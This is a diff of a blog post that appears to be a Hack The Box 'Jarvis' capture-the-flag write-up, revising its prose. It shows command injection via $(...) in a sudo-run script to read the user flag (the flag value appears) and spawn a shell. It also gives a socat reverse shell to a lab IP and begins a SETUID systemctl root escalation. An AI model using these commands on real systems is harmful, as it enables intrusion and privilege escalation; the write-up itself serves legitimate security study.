Maddosaurus/maddosaurus.github.io/_posts/2020-06-07-htb-jarvis.md

 Enter an IP: $(cat /home/pepper/user.txt)

-ping: 2afa36c4f05b37b34259c93551f5c44f: Temporary failure in name resolution
+ping: 2afa36c4f05b37b34259[...]]: Temporary failure in name resolution
 ```

-but not only that.
+which yields the user flag.
+But this is not everything this shell can do.
 By upgrading the shell to a full interactive shell first (`python -c 'import pty; pty.spawn("/bin/sh")'`),
 we're able to spawn a shell as pepper:
 ```
 sudo --user=pepper /var/www/Admin-Utilities/simpler.py -p

 Enter an IP: $(/bin/bash)
 $(/bin/bash)
-pepper@jarvis:/$ ^^
+pepper@jarvis:/$
 ```
-This shell isn't perfectly working, so we're upgrading to a full reverse shell.
-Fire up nc on port 8989 and
+This shell isn't perfectly working, so it is upgraded to a full reverse shell.
+With nc running on port 8989, this command yields a fully functioning shell:
 `socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.15.195:8989`
-So let's continue.

 ## Road to root
-So by poking around we find that systemctl has the SETUID bit set.
-That means that it runs under root!
+Exploring privilege escalation routes, it turns out that systemctl has the *SETUID* bit set, meaning it can run with root privileges.
-We could pin together a systemctl oneshot service to reverse shell out as root...
+Creating a systemctl oneshot service that spawns a reverse shell as root is therefore possible:
 ```
 [Unit]
 Description=Black magic happening, avert your eyes